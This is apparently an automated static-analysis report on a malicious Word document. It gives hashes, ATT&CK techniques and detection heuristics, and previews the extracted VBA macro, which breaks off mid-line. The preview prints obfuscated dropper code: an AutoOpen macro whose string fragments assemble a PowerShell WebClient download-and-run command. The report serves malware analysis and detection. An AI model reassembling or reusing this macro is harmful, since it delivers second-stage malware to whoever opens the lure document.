Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a77e40b03e814c6f…

MALICIOUS

Office (OLE)

241.0 KB Created: 2017-12-31 08:51:00 Authoring application: Microsoft Office Word First seen: 2018-01-08
MD5: 1ef18a696db0a4bd8ef98ee74797a268 SHA-1: 56ffeb3383f9bfef0773bbe6dd5d6d6a71887469 SHA-256: a77e40b03e814c6f554929a939839416d80f73228a123ab953be37a1f25780b5
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes the Shell() function, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure' further supports this analysis, suggesting a lure used to deliver malicious content.

Heuristics 8

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 80336 bytes
SHA-256: 7e77356e2e915cf67af740ec088aa3d2c8015915d21f227dcc4d17cb3048c307
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SNTwjEnGXRiTn"
Function tIZpqwIrwK()
On Error Resume Next
wrwRW = (ARuhhjibNztik - Rnd(43 * Tan(LJaPqfTROvwSZk)) / qbNkJOYd * Oct(QijCrlVbGjNHj) * wWWjDzjPHtPXW / Oct(tbfmjizLwRa - Chr(250) + 581 - ChrB(aWLpXEKnPNm)) - 389 + ViJBXpmTOqi)
kJvroT = (FuuknmEiNpu - Rnd(43 * Tan(jQKMYbm)) / zHQrwnXOGnr * Oct(oFLbwSkJBiAN) * tzWzLFK / Oct(JdziDnz - Chr(250) + 581 - ChrB(qYawLNdEi)) - 389 + GrdYRGDpC)
taHhjhni = (GMNDwvhmHXdlpk) + Mid("PmZuftAJ+HmRXs0z7Xs0+Xs0huasXs0+Xs0 = S4MwY1Y2cwObnoTrNz3", 9, 31)
RPkjEnzuOCV = (DabwnmaEJZY - Rnd(43 * Tan(DRWLNiQf)) / ARBYwoHfGOkoh * Oct(wcLzcnhVvFzz) * SbGfZCpD / Oct(ZZpwSZCK - Chr(250) + 581 - ChrB(XWiaiBinsHiVw)) - 389 + AhpEzjKmrjm)
vmaIQhNbG = (ZtzEPwpbzua - Rnd(43 * Tan(FCLdHVjhduNFP)) / jHWSdFiolm * Oct(EZJSsovj) * ztTinFMfwffu / Oct(tPiFfRVKRRZUC - Chr(250) + 581 - ChrB(WPkGSYhXmnniYs)) - 389 + qFGPQft)
TkDEKS = (ZbbrsFwlJ - Rnd(43 * Tan(YodzoQdVDbik)) / vofPYJXzLkf * Oct(YFzLumY) * JKwYoVNrnQJ / Oct(pzfDMqXcmiND - Chr(250) + 581 - ChrB(vPLjJIoFHUlpHa)) - 389 + wfMvatM)
nizrjqAz = (mKiVITl) + Mid("rdYABzPFJUj39-rEPlACE  ([cH'+'Ar]83+[cHAr]122+[cHAr]55),[cHAr]36) SEv& ( Av0Env:cOmSPEc[4,26,25]-JoinXs0Xs'+'0)HmR).RePLace(HmRAv0HmR,HmROMiHmR).RePLace(HmRSEvHmR,[sTRING'+'][CHAR]124)VQP7auE7nZDFkCnwajwzn", 12, 173)
DVALwJtapRl = (nIiLXfcuOlIq - Rnd(43 * Tan(NYNVGWduR)) / scGaLSE * Oct(QcfzznMJsJtZ) * PCncjttJJQpVH / Oct(jRERbJwrNlQb - Chr(250) + 581 - ChrB(IwdTArHdaS)) - 389 + iZLdHMpbqCdsns)
jzikYi = (EJUInvsvD - Rnd(43 * Tan(wMMqTuUfBKfZT)) / wizotzhWXDKnDw * Oct(qCvrjLzzjz) * TowzkipYK / Oct(zECELboJ - Chr(250) + 581 - ChrB(fqYLKHkhkjA)) - 389 + RofftYYTjzfl)
dCPjCcjYVYz = (fwpdzHIw - Rnd(43 * Tan(nCwVkBv)) / lXfEqbibNGmQm * Oct(FaQcPzwquU) * jEPSZmmGWUwFIo / Oct(GCmBWhTOwY - Chr(250) + 581 - ChrB(HlvrvcK)) - 389 + KWSInTzJ)
jwPrwiv = (QuXoCLFTl) + Mid("HSvMFPzR3brlJEB5lSr0hrbZO2ranXs0+Xs'+'0dXs0+Xs0om;SXs0+XsHmR'+'+HmR0z7Xs0+Xs0bcd =HmR+HmR XHmR+HmRs0+Xs0KXs0+'+'Xs00K01", 27, 90)
pSZtYKNmE = (twsnXjJo - Rnd(43 * Tan(TXudorz)) / FoJdfPXYSDPpzh * Oct(mARJrtMA) * sPVHlPkhTisqb / Oct(NiVPFftwBlLH - Chr(250) + 581 - ChrB(WhHDtoSkQuP)) - 389 + CTiVQpVLUDaW)
TYjCnDIljh = (MrjjflMSKKih - Rnd(43 * Tan(CMwcijmuj)) / FjbWJjWEYr * Oct(tkiTYki) * CKqrVITaw / Oct(ipofTdzEPDmoF - Chr(250) + 581 - ChrB(qJJcQJJ)) - 389 + DciNPpFNpFZPuB)
vUBiLX = (fwBJwzoF - Rnd(43 * Tan(DMKclvqwITH)) / ZnTUqCLTJOGj * Oct(lrTBXGmQ) * CInRcnF / Oct(ftsaFLhpFvcm - Chr(250) + 581 - ChrB(oFbSzEWukN)) - 389 + UYkLjZZYNc)
ptUSZEWr = (GUwtOjwdnNz) + Mid("Avr77iTas0+Xs0lit(K0Xs0+Xs0Q,K0Q);Sz7Xs0+Xs0ka'+'rXs0+Xs0apXs0+XsHmR'+'+HmR0asXs0+Xs0 = SzXs0+Xs07nsaXs0+XHmR+HmRs0'+'daXs0+Xs0sd.next(1, 3HmR+HmRXs0+XaBTDpVf", 9, 143)
aifDT = (NQFTUVffN - Rnd(43 * Tan(lBMzqKm)) / fmMBFOKwBNj * Oct(qKotwLLpp) * XwRJdotOzvm / Oct(PPDLLqJVUSzw - Chr(250) + 581 - ChrB(aMTCizzpC)) - 389 + QkwkWFmOl)
cRMhjwj = (OoRhhzWqBV - Rnd(43 * Tan(qLMscaWlwA)) / HzjloAP * Oct(AaGzVGijsJWZ) * vzRYIVhjMu / Oct(XNjSzwKW - Chr(250) + 581 - ChrB(PUvkLrmztdc)) - 389 + biMBSNjihF)
riZzB = (SuDbaMUvptMAnb - Rnd(43 * Tan(FmPhENWHf)) / dRiiQVuJSRBhu * Oct(atpmMjYCJkO) * EbBjwnYowupQY / Oct(RrUKOYsjGK - Chr(250) + 581 - ChrB(juvOaItPXQ)) - 389 + HjVNJGijE)
ouMHDK = (GvZpkAUjUIF) + Mid("w70PNMapJb3iEsp4R5ZsmR+HmRXs0t SyXs0+Xs0stem.NetXs0+Xs0.WXs0+Xs0ebCHmR+HmRlient;Sz7nXs8Kc", 21, 66)
VSKqnFz = (fwbHZMjwzAwGb - Rnd(43 * Tan(jMQijmj)) / iwiUQijir * Oct(KfPmkkNlJjdYc) * kzlBPwwSFN / Oct(fYEvENVIF - Chr(250) + 581 - ChrB(vmubjUwdCoJTKk)) - 389 + thOvuraCX)
Bssaw = (iLbchGRDCkFlG - Rnd(43 * Tan(SPnkQaJzUWV)) / YqtwnXMVi * Oct(zwcQJrNRrU) * AFHItiEhkqEHSi / Oct(KFwhZkuwRqI - Chr(250) + 581 - ChrB(QSjDfAP)) - 389 + klousHozcs)
viYaru = (boMrZjbApC - Rnd(43 * Tan(FLOUdLfGNK)) / VkXXVLH * Oct(jjtvivEBIf) * uCYdRtzoM / Oct(nBDNXTcUCOQsRT - Chr(250) + 5
... (truncated)